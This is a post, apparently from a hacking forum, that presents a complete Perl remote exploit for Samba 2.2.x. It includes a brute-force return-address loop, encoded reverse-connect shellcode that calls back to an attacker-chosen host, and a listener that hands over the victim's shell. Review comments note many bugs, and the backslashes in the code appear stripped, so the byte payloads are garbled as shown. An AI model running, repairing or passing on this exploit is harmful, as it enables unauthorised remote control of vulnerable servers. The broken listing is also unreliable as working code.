Haaaa, take a look at this, dude.
How to hack:
I'm using this code:
[src]
use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;
# Install the SIGUSR2 handler (GoAway, defined below) so the listener side can tell
# this process to stop.
# NOTE(review): as pasted this reads `&GoAway`, not `\&GoAway`. `&GoAway` *calls*
# the sub right here (and GoAway exits), instead of storing a code reference.
# Backslashes appear to have been stripped throughout this listing: the "xNN" byte
# strings and the trailing "n" on messages show the same damage, and interpolations
# such as "$target_typen" name an undeclared variable, so as shown the file does not
# even compile under `use strict`. It also lacks `use warnings`.
$SIG{USR2} = &GoAway;
my %args;
# Per-target parameters, indexed as the trailing comment documents:
#   [0] default return address (single-shot mode; overridable with -r)
#   [1] first return address tried in brute-force mode (highest)
#   [2] last return address tried in brute-force mode (lowest)
#   [3] amount subtracted from the return address after each attempt
#   [4] payload builder, invoked as ->($local_host, $local_port, $return_address)
# NOTE(review): same stripped-backslash problem: `&CreateBuffer_*` is a call, not a
# code ref, so element [4] would hold a string and `->[4]->(...)` would die under
# strict refs.
my %targets =
(
"linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, &CreateBuffer_linx86],
"solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, &CreateBuffer_solx86],
"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, &CreateBuffer_bsdx86],
# name # default # start # end # step # function
);
# Command-line parsing.
# NOTE(review): Getopt::Std wants a hash *reference* (`\%args`); passing `%args`
# flattens the (empty) hash, so the options would land in $opt_* package variables
# and every $args{...} lookup below would stay undef (-> Usage()). `-p` is read
# below but not declared here, and the `:` syntax belongs to getopts(), not getopt().
getopt('t:M:h:r:H:P:', %args);
# Required: target type (-t), target host (-h), callback/local host (-H).
my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host = $args{H} || Usage();
# Optional with defaults: callback listener port (-P) and Samba port (-p).
my $local_port = $args{P} || 1981;
my $target_port = $args{p} || 139;
my $target_mode = "brute";
if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_typen";
# allow single mode via the -M option
# (any -M value other than S, case-insensitively, leaves the default "brute")
if ($args{M} && uc($args{M}) eq "S")
{
$target_mode = "single";
}
# the parent process listens for an incoming connection
# the child process handles the actual exploitation
# $listen_pid is captured before the fork inside StartListener, so in the child it
# names the parent; the rest of this file runs in the child only (the parent never
# returns from StartListener).
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);
# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
# NOTE(review): string eval of a command-line value -- this runs arbitrary Perl
# passed via -r. It only affects the operator's own process, but a numeric parse
# (hex()/oct()) would do the job without that footgun.
$targ_ret = eval($targ_ret);
# Defensive check; $target_mode can only be "brute" or "single" at this point.
# NOTE(review): every error path in this script exits with status 0, so a wrapper
# cannot tell failure from success.
if ($target_mode !~ /brute|single/)
{
print "[*] Invalid attack mode: $target_mode (single or brute only)n";
exit(0);
}
if ($target_mode eq "single")
{
$curr_ret = $targ_ret;
# A return address that eval'd to 0/undef is rejected; the listener parent is
# told to exit as well so no orphan is left waiting on the port.
if(! $targ_ret)
{
print "[*] Invalid return address specified!n";
kill("USR2", $listen_pid);
exit(0);
}
print "[*] Starting single shot mode...n";
printf ("[*] Using return address of 0x%.8xn", $targ_ret);
# One payload for the chosen address; the return value of AttemptExploit is not used.
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
# Give a callback two seconds to arrive before shutting the listener down.
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
if ($target_mode eq "brute")
{
print "[*] Starting brute force mode...n";
# Walk the return address downward from [1] to [2] in steps of [3], one payload per
# address. A successful callback is handled by the listener parent, which SIGUSR2s
# this child to stop the loop (see StartListener).
for (
$curr_ret =$targets{$target_type}->[1];
$curr_ret >= $targets{$target_type}->[2];
$curr_ret -=$targets{$target_type}->[3]
)
{
# Loop-invariant: STDOUT autoflush is re-enabled on every iteration.
select(STDOUT); $|++;
my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
# The leading " r" looks like a stripped "\r" (progress line overwritten in place).
printf (" r[*] Return Address: 0x%.8x", $curr_ret);
my $ret = AttemptExploit($target_host, $target_port, $buf);
}
sleep(2);
kill("USR2", $listen_pid);
exit(0);
}
# Print the usage text to STDERR and terminate with status 1.
# Called when a required option (-t, -h, -H) is missing or the -t value is not a key
# of the file-level %targets hash; the target list is generated from that hash so
# the two cannot drift apart.
sub Usage {
    my @text = (
        "n",
        " samba-2-2-x.pl - Samba 2.2.x Remote Exploitn",
        "===================================nn",
        " Usage: n",
        " $0 <options> -t <target type> -H <your ip> -h <target ip>n",
        " Options: n",
        " -M (S|<single or brute mode>n",
        " -r <return address for single mode>n",
        " -p <alternate Samba port>n",
        " -P <alternate listener port>n",
        " Targets:n",
    );
    print STDERR $_ for @text;
    for my $type (keys(%targets)) {
        print STDERR " $typen";
    }
    print STDERR "n";
    exit(1);
}
# Open the callback listener and fork.
#
# Parameters: $local_port - TCP port to listen on. No LocalAddr is passed, so this
#   presumably binds every interface.
# Returns: only in the child, the value fork() gave it (0). The parent never returns:
#   it loops on accept() and relays each connection through StartShell, sending
#   SIGUSR2 to the child as soon as a connection arrives.
sub StartListener {
my ($local_port) = @_;
# Unused; shadows the file-level $listen_pid set by the caller.
my $listen_pid = $$;
my $s = IO::Socket::INET->new (
Proto => "tcp",
LocalPort => $local_port,
Type => SOCK_STREAM,
Listen => 3,
ReuseAddr => 1
);
# NOTE(review): a bind/listen failure exits with status 0.
if (! $s)
{
print "[*] Could not start listener: $!n";
exit(0);
}
print "[*] Listener started on port $local_portn";
# NOTE(review): fork() returning undef (failure) is not handled; the process would
# then fall through and behave as the child.
my $exploit_pid = fork();
if ($exploit_pid)
{
my $victim;
# NOTE(review): `&GoAway` (backslash stripped as pasted) calls GoAway instead of
# installing it as the handler.
$SIG{USR2} = &GoAway;
# Accept loop. Every connection is treated as the callback -- there is no check on
# the peer address, so anything that reaches this port is relayed to the terminal.
while ($victim = $s->accept())
{
kill("USR2", $exploit_pid);
print STDOUT "n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "nn";
StartShell($victim);
}
exit(0);
}
return ($exploit_pid);
}
# Relay an accepted callback connection to the local terminal.
#
# Parameters: $client - connected socket returned by accept() in StartListener.
# Returns: nothing meaningful; normally runs until the exit() inside the loop.
#
# STDIN, STDOUT and the socket are made non-blocking and autoflushed, then
# IO::Select polls the socket and STDIN every 0.2s and copies whatever is readable
# to the other side.
sub StartShell {
my ($client) = @_;
my $sel = IO::Select->new();
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
# Banner request sent to the remote side. The backticks are literal characters in a
# Perl double-quoted string; they are meant to be expanded by the remote shell, not
# by this script.
print $client "echo --=[ Welcome to `hostname` (`id`)n";
print $client "echo n";
# Loop while the socket still has a file descriptor (i.e. has not been closed).
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(0.2);
foreach $fd (@fds)
{
# List-context read on a non-blocking handle: whatever is available right now.
my @in = <$fd>;
# NOTE(review): an empty read is skipped here, so the close branch below is only
# reached with data in hand, and both handles are always true -- the branch
# appears unreachable. A peer disconnect (readable socket, empty read) therefore
# does not end the loop; it keeps polling at 5Hz.
if(! scalar(@in)) { next; }
if (! $fd || ! $client)
{
print "[*] Closing connection.n";
close($client);
exit(0);
}
# Handles compare as strings (same object -> same stringification): socket data
# goes to the terminal, terminal input goes to the socket.
if ($fd eq $client)
{
print STDOUT join("", @in);
} else {
print $client join("", @in);
}
}
}
close ($client);
}
# Connect to the target's SMB port and send one payload.
#
# Parameters: $Host, $Port - target address and port;
#   $Exploit - the buffer produced by one of the CreateBuffer_* builders.
# Returns: nothing meaningful (the value of close()).
#
# Sequence: connect; send the two fixed preamble blobs ($SetupSession, $TreeConnect),
# reading a reply after each with ReadResponse's 4-second timeout; send the payload
# and 808 zero bytes; read once more; close. Replies are read but never inspected.
sub AttemptExploit {
my ($Host, $Port, $Exploit) = @_;
my $res;
# NOTE(review): IO::Socket::INET's option is `Proto` (as StartListener uses);
# `Protocol` is probably ignored, which only works because tcp is the default.
my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");
# A failed connect also shuts down the listener parent ($listen_pid is file-level),
# exiting with status 0 like the other error paths.
if (! $s)
{
print "n[*] Error: could not connect: $!n";
kill("USR2", $listen_pid);
exit(0);
}
# Autoflush, then switch the socket to non-blocking.
# NOTE(review): the print() calls below are unchecked; on a non-blocking socket a
# short or failed write would go unnoticed.
select($s); $|++;
select(STDOUT); $|++;
Unblock($s);
# NOTE(review): these byte strings have lost their backslashes in this paste ("x00"
# should read "\x00"), so as written they are ASCII text, not the intended octets.
# Left untouched here.
my $SetupSession =
"x00x00x00x2exffx53x4dx42x73x00x00x00x00x08".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00xffx00x00x00x00x20x02x00x01".
"x00x00x00x00";
my $TreeConnect =
"x00x00x00x3cxffx53x4dx42x70x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00".
"x00x00x64x00x00x00x00x00x00x00x5cx5cx69x70x63x24".
"x25x6ex6fx62x6fx64x79x00x00x00x00x00x00x00x49x50".
"x43x24";
my $Flush = ("x00" x 808);
print $s $SetupSession;
$res = ReadResponse($s);
print $s $TreeConnect;
$res = ReadResponse($s);
# uncomment this for diagnostics
#print "[*] Press Enter to Continue...n";
#$res = <STDIN>;
#print "[*] Sending Exploit Buffer...n";
print $s $Exploit;
print $s $Flush;
ReadResponse($s);
close($s);
}
# Build the payload string for the "linx86" target.
#
# Parameters: $Host - callback address (resolved with gethostbyname);
#   $Port - callback port; $Return - return address (a number, or a Perl expression
#   that is string-eval'd).
# Returns: the payload string.
#
# Layout, in order, as the inline comments label it: fixed header bytes, a
# GetNops(772) sled, the XOR decoder stub, the encoded reverse-connect stub with the
# callback address and port patched in, GetNops(87), the return address repeated
# eight times, "DDI!", and 277 NULs.
# NOTE(review): every "xNN" string in this sub has lost its backslashes in this paste
# and is ASCII text as written, not octets. Left untouched here.
sub CreateBuffer_linx86 {
my ($Host, $Port, $Return) = @_;
# NOTE(review): string eval of a caller-supplied value (the -r option reaches here in
# single mode, already eval'd once by the caller); hex() would avoid running Perl.
my $RetAddr = eval($Return);
# "l" is native-endian signed 32-bit: correct only on a little-endian host, and the
# table's 0xbf...... values rely on wraparound -- "V" would state the intent.
$RetAddr = pack("l", $RetAddr);
# gethostbyname() in scalar context yields the packed 4-byte address, or undef on
# failure. Failure is not checked; with undef the four chr(ord(undef) ^ 0x93) below
# would silently become chr(0x93).
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
# Address bytes are XORed with 0x93, the same constant that appears in the decoder
# stub bytes below ("x80x30x93"), presumably its key, so they decode with the rest.
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
# Port as two bytes in reversed native order (network order on a little-endian
# host), XORed with the same key.
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(772) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, mangled lamagra code + fixes
"x1ax76xa2x41x21xf5x1ax43xa2x5ax1ax58xd0x1axcex6b".
"xd0x1axcex67xd8x1axdex6fx1exdex67x5ex13xa2x5ax1a".
"xd6x67xd0xf5x1axcex7fxf5x54xd6x7d".
$p1.$p2 ."x54xd6x63". $a1.$a2.$a3.$a4.
"x1exd6x7fx1axd6x6bx55xd6x6fx83x1ax43xd0x1exdex67".
"x5ex13xa2x5ax03x18xcex67xa2x53xbex52x6cx6cx6cx5e".
"x13xd2xa2x41x12x79x6ex6cx6cx6cxaax42xe6x79x78x8b".
"xcdx1axe6x9bxa2x53x1bxd5x94x1axd6x9fx23x98x1ax60".
"x1exdex9bx1exc6x9fx5ex13x7bx70x6cx6cx6cxbcxf1xfa".
"xfdxbcxe0xfb".
GetNops(87).
# Return address repeated; then a marker and zero padding.
($RetAddr x 8).
"DDI!". ("x00" x 277);
return $exploit;
}
# Build the payload string for the "solx86" target.
#
# Parameters: $Host - callback address (resolved with gethostbyname);
#   $Port - callback port; $Return - return address (number or Perl expression,
#   string-eval'd).
# Returns: the payload string.
#
# Near-duplicate of CreateBuffer_linx86 (same header bytes, same decoder, same
# address/port encoding); differs in the sled length (813), the encoded stub, and
# the trailer, which here is "010101", then $RetAddr/$IckAddr twice alternating,
# "101010", "DDI!" and 277 NULs. The three builders would collapse into one
# parameterised helper, but that is left alone here.
# NOTE(review): every "xNN" string in this sub has lost its backslashes in this paste
# and is ASCII text as written, not octets. Left untouched here.
sub CreateBuffer_solx86 {
my ($Host, $Port, $Return) = @_;
# NOTE(review): string eval of a caller-supplied value; hex() would avoid running Perl.
my $RetAddr = eval($Return);
# Second address 512 bytes below the return address (see comment after the packs).
my $IckAddr = $RetAddr - 512;
# "l" is native-endian signed 32-bit; relies on a little-endian host.
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
# gethostbyname() failure (undef) is not checked -- see CreateBuffer_linx86.
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
# Callback address and port XORed with 0x93, the constant also present in the
# decoder bytes below ("x80x30x93"), presumably its key.
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(813) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, code by bighawk
"x2bx6cx6bx6cxafx64x43xc3xa2x53x23x09xc3x1ax76xa2".
"x5axc2xd2xd2xc2xc2x23x75x6cx46xa2x41x1ax54xfb".
$a1.$a2.$a3.$a4 ."xf5xfb". $p1.$p2.
"xf5xc2x1ax75xf9x83xc5xc4x23x78x6cx46xa2x41x21x9a".
"xc2xc1xc4x23xadx6cx46xdaxeax61xc3xfbxbcxbcxe0xfb".
"xfbxbcxf1xfaxfdx1ax70xc3xc0x1ax71xc3xc1xc0x23xa8".
"x6cx46".
GetNops(87) .
# Trailer: two six-character literals bracketing the alternating addresses.
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("x00" x 277);
return $exploit;
}
# Build the payload string for the "fbsdx86" target.
#
# Parameters: $Host - callback address (resolved with gethostbyname);
#   $Port - callback port; $Return - return address (number or Perl expression,
#   string-eval'd).
# Returns: the payload string.
#
# Near-duplicate of CreateBuffer_solx86: same header bytes, decoder, address/port
# encoding and trailer ("010101", $RetAddr/$IckAddr alternating, "101010", "DDI!",
# 277 NULs); differs only in the sled length (830) and the encoded stub.
# NOTE(review): every "xNN" string in this sub has lost its backslashes in this paste
# and is ASCII text as written, not octets. Left untouched here.
sub CreateBuffer_bsdx86 {
my ($Host, $Port, $Return) = @_;
# NOTE(review): string eval of a caller-supplied value; hex() would avoid running Perl.
my $RetAddr = eval($Return);
# Second address 512 bytes below the return address (see comment after the packs).
my $IckAddr = $RetAddr - 512;
# "l" is native-endian signed 32-bit; relies on a little-endian host.
$RetAddr = pack("l", $RetAddr);
$IckAddr = pack("l", $IckAddr);
# IckAddr needs to point to a writable piece of memory
# gethostbyname() failure (undef) is not checked -- see CreateBuffer_linx86.
my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
# Callback address and port XORed with 0x93, the constant also present in the
# decoder bytes below ("x80x30x93"), presumably its key.
$a1 = chr(ord($a1) ^ 0x93);
$a2 = chr(ord($a2) ^ 0x93);
$a3 = chr(ord($a3) ^ 0x93);
$a4 = chr(ord($a4) ^ 0x93);
my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
$p1 = chr(ord($p1) ^ 0x93);
$p2 = chr(ord($p2) ^ 0x93);
my $exploit =
# trigger the samba-2-2-x.pl overflow
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00".
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90".
GetNops(830) .
# xor decoder courtesy of hsj
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01".
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30".
"x93x40xe2xfa".
# reverse-connect, code by bighawk
"xa2x5ax64x72xc2xd2xc2xd2xc2xc2x23xf2x5ex13x1ax50".
"xfb". $a1.$a2.$a3.$a4 ."xf5xfb". $p1.$p2.
"xf5xc2x1ax75x21x83xc1xc5xc3xc3x23xf1x5ex13xd2x23".
"xc9xdaxc2xc0xc0x5ex13xd2x71x66xc2xfbxbcxbcxe0xfb".
"xfbxbcxf1xfaxfdx1ax70xc2xc7xc0xc0x23xa8x5ex13".
GetNops(87) .
# Trailer: two six-character literals bracketing the alternating addresses.
"010101".
$RetAddr.
$IckAddr.
$RetAddr.
$IckAddr.
"101010".
"DDI!". ("x00" x 277);
return $exploit;
}
# Put a filehandle (glob or IO::Handle object) into non-blocking mode by OR-ing
# O_NONBLOCK into its existing fcntl flags. Dies if either fcntl call fails; the
# value of the final fcntl is what the sub evaluates to (callers ignore it).
sub Unblock {
    my ($handle) = @_;
    my $current = fcntl($handle, F_GETFL, 0)
        or die "Can't get flags for file handle: $!n";
    fcntl($handle, F_SETFL, $current | O_NONBLOCK)
        or die "Can't make handle nonblocking: $!n";
}
# SIGUSR2 handler shared by the listener parent and the sending child: end this
# process with status 0. Any arguments are ignored.
sub GoAway {
    exit 0;
}
# Wait up to four seconds for $sock to become readable, then take one line from it.
# Returns undef when nothing arrived in time (the loop body never runs). Callers in
# this file treat the reply as opaque and mostly discard it.
sub ReadResponse {
    my ($sock) = @_;
    my $reply;
    for my $ready (IO::Select->new($sock)->can_read(4)) {
        $reply .= <$sock>;
    }
    return $reply;
}
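# Debugging aid (not called anywhere in this file): print $data as a run of
# "x%.2x" tokens, 16 per line, followed by a final line break.
#
# Parameters: $data - arbitrary byte string (empty string prints just the trailer).
# Returns: nothing meaningful (the value of the last print).
#
# NOTE(review): the literal "x" prefix and trailing "n" look like "\x" and "\n" with
# the backslashes stripped in this paste; they are left as found.
sub HexDump {
    my ($data) = @_;
    my $col = 0;
    foreach my $byte (split(//, $data)) {
        # Break the line once 16 tokens are on it. The original compared with
        # `> 16`, which let 17 tokens through per line.
        if ($col >= 16) {
            print "n";
            $col = 0;
        }
        printf("x%.2x", ord($byte));
        $col++;
    }
    print "n";
}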
# thank you k2
# Return a string of $cnt characters drawn at random (rand, with replacement) from
# the list below; the list is credited to k2 in the comment above. Presumably each
# entry is meant to be a single-byte instruction safe to execute, so the result acts
# as a sled in front of the decoder. $cnt <= 0 yields "".
# NOTE(review): as pasted the "xNN" escapes have lost their backslashes, so @nops
# holds the ASCII characters of the literal text, not the intended bytes.
sub GetNops {
my ($cnt) = @_;
my @nops = split(//,"x99x96x97x95x93x91x90x4dx48x47x4fx40x41x37x3fx97".
"x46x4exf8x92xfcx98x27x2fx9fxf9x4ax44x42x43x49x4b".
"xf5x45x4cx4c");
# `rand @nops` is a float in [0, scalar @nops); it is truncated when used as an index.
return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}
[/src]